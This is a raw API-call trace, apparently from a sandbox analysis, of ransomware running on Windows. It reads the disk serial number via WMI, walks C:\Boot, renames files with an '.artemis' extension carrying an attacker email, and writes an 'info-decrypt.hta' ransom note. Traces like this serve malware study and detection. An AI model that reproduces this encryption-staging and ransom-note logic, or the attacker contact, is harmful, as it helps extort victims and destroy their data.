riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee38 | out: ppvObject=0x689ee38*=0x0) returned 0x80004002 [0198.388] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0198.388] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0198.389] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e744 | out: ppvObject=0x689e744*=0x0) returned 0x80004002 [0198.389] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e750 | out: ppvObject=0x689e750*=0x0) returned 0x80004002 [0198.389] CoGetContextToken (in: pToken=0x689e7b0 | out: pToken=0x689e7b0) returned 0x0 [0198.389] CoGetContextToken (in: pToken=0x689ebb8 | out: pToken=0x689ebb8) returned 0x0 [0198.389] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec48 | out: ppvObject=0x689ec48*=0x0) returned 0x80004002 [0198.389] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0198.389] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0198.389] CoGetContextToken (in: pToken=0x689f228 | out: pToken=0x689f228) returned 0x0 [0198.389] CoGetContextToken (in: pToken=0x689f188 | out: pToken=0x689f188) returned 0x0 [0198.389] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x689f258*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f254 | out: ppvObject=0x689f254*=0x6736ee8) returned 0x0 [0198.389] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0198.389] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0198.389] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x689f3ec | out: puCount=0x689f3ec*=0x2) returned 0x0 [0198.389] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x689f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x689f3e8*=0xf, pszText=0x0) returned 0x0 [0198.389] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=8, puBuffLength=0x689f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.389] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f2c4 | out: ppv=0x689f2c4*=0x6736e48) returned 0x0 [0198.389] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e48, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f358 | out: ppNamespace=0x689f358*=0x6748314) returned 0x0 [0201.275] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1f4 | out: ppvObject=0x689f1f4*=0x781544) returned 0x0 [0201.276] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781544, pProxy=0x6748314, pAuthnSvc=0x689f244, pAuthzSvc=0x689f240, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c, pImpLevel=0x689f22c, pAuthInfo=0x689f230, pCapabilites=0x689f234 | out: pAuthnSvc=0x689f244*=0xa, pAuthzSvc=0x689f240*=0x0, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c*=0x6, pImpLevel=0x689f22c*=0x2, pAuthInfo=0x689f230, pCapabilites=0x689f234*=0x1) returned 0x0 [0201.276] WbemLocator:IUnknown:Release (This=0x781544) returned 0x1 [0201.276] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e8 | out: ppvObject=0x689f1e8*=0x781564) returned 0x0 [0201.276] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e4 | out: ppvObject=0x689f1e4*=0x781544) returned 0x0 [0201.276] WbemLocator:IClientSecurity:SetBlanket (This=0x781544, pProxy=0x6748314, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0201.276] WbemLocator:IUnknown:Release (This=0x781544) returned 0x2 [0201.276] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0201.276] CoTaskMemFree (pv=0x77e118) [0201.276] WbemLocator:IUnknown:Release (This=0x6736e48) returned 0x0 [0201.277] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ede4 | out: ppvObject=0x689ede4*=0x781564) returned 0x0 [0201.277] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eda0 | out: ppvObject=0x689eda0*=0x0) returned 0x80004002 [0201.283] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ebbc | out: ppvObject=0x689ebbc*=0x0) returned 0x80004002 [0201.286] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0201.286] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0201.288] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6ac | out: ppvObject=0x689e6ac*=0x0) returned 0x80004002 [0201.289] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e6b8 | out: ppvObject=0x689e6b8*=0x7814c4) returned 0x0 [0201.290] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7814c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e6c0 | out: pCid=0x689e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.290] WbemLocator:IUnknown:Release (This=0x7814c4) returned 0x3 [0201.290] CoGetContextToken (in: pToken=0x689e718 | out: pToken=0x689e718) returned 0x0 [0201.290] CoGetContextToken (in: pToken=0x689eb20 | out: pToken=0x689eb20) returned 0x0 [0201.290] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebb0 | out: ppvObject=0x689ebb0*=0x78154c) returned 0x0 [0201.290] WbemLocator:IRpcOptions:Query (in: This=0x78154c, pPrx=0x781564, dwProperty=2, pdwValue=0x689ebd8 | out: pdwValue=0x689ebd8) returned 0x80004002 [0201.290] WbemLocator:IUnknown:Release (This=0x78154c) returned 0x3 [0201.290] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0201.290] CoGetContextToken (in: pToken=0x689f0f8 | out: pToken=0x689f0f8) returned 0x0 [0201.290] CoGetContextToken (in: pToken=0x689f058 | out: pToken=0x689f058) returned 0x0 [0201.290] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x689f128*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f124 | out: ppvObject=0x689f124*=0x6748314) returned 0x0 [0201.290] WbemLocator:IUnknown:AddRef (This=0x6748314) returned 0x4 [0201.290] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x3 [0201.290] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x2 [0201.290] SysStringLen (param_1=0x0) returned 0x0 [0201.290] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738460, puCount=0x689f4bc | out: puCount=0x689f4bc*=0x0) returned 0x0 [0201.290] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4b8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4b8*=0x20, pszText=0x0) returned 0x0 [0201.290] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4b8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4b8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.291] CoGetContextToken (in: pToken=0x689f128 | out: pToken=0x689f128) returned 0x0 [0201.291] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0201.291] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efbc | out: ppvObject=0x689efbc*=0x781564) returned 0x0 [0201.291] WbemLocator:IUnknown:Release (This=0x781564) returned 0x3 [0201.291] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0201.291] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0x20, pszText=0x0) returned 0x0 [0201.291] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x689f4c0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.291] IWbemServices:GetObject (in: This=0x6748314, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f474*=0x0, ppCallResult=0x0 | out: ppObject=0x689f474*=0x673c128, ppCallResult=0x0) returned 0x0 [0202.048] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x689f474 | out: puCount=0x689f474*=0x2) returned 0x0 [0202.048] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x689f470*=0x0, pszText=0x0 | out: puBuffLength=0x689f470*=0xf, pszText=0x0) returned 0x0 [0202.048] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x689f470*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f470*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.049] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f470*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531a1c*=0, plFlavor=0x3531a20*=0 | out: pVal=0x689f470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3531a1c*=8, plFlavor=0x3531a20*=0) returned 0x0 [0202.049] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.049] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.049] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531a1c*=8, plFlavor=0x3531a20*=0 | out: pVal=0x689f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3531a1c*=8, plFlavor=0x3531a20*=0) returned 0x0 [0202.049] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.049] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.049] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.049] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f078, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x48 [0202.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4d8) returned 1 [0202.049] GetFileAttributesExW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x689f554 | out: lpFileInformation=0x689f554*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0202.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4d4) returned 1 [0202.049] MoveFileW (lpExistingFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0202.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0202.051] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0202.051] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0202.051] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0202.052] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.052] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0202.052] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0202.052] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0202.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0202.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0202.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0202.052] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0202.052] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0202.052] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0202.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0202.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0202.053] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0202.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0202.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0202.053] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.053] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.053] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0202.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f57c) returned 1 [0202.054] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta" (normalized: "c:\\boot\\de-de\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f5f8 | out: lpFileInformation=0x689f5f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f578) returned 1 [0202.054] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.054] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0202.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b0) returned 1 [0202.054] CreateFileW (lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta" (normalized: "c:\\boot\\de-de\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a4 [0202.054] GetFileType (hFile=0x5a4) returned 0x1 [0202.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4ac) returned 1 [0202.054] GetFileType (hFile=0x5a4) returned 0x1 [0202.055] WriteFile (in: hFile=0x5a4, lpBuffer=0x35384a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f574, lpOverlapped=0x0 | out: lpBuffer=0x35384a0*, lpNumberOfBytesWritten=0x689f574*=0x1000, lpOverlapped=0x0) returned 1 [0202.056] WriteFile (in: hFile=0x5a4, lpBuffer=0x35384a0*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f548, lpOverlapped=0x0 | out: lpBuffer=0x35384a0*, lpNumberOfBytesWritten=0x689f548*=0x557, lpOverlapped=0x0) returned 1 [0202.056] CloseHandle (hObject=0x5a4) returned 1 [0202.056] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f098, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f544) returned 1 [0202.056] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x35394bc | out: lpFileInformation=0x35394bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0202.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f540) returned 1 [0202.057] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f478) returned 1 [0202.057] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0202.057] GetFileType (hFile=0x5a4) returned 0x1 [0202.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f474) returned 1 [0202.057] GetFileType (hFile=0x5a4) returned 0x1 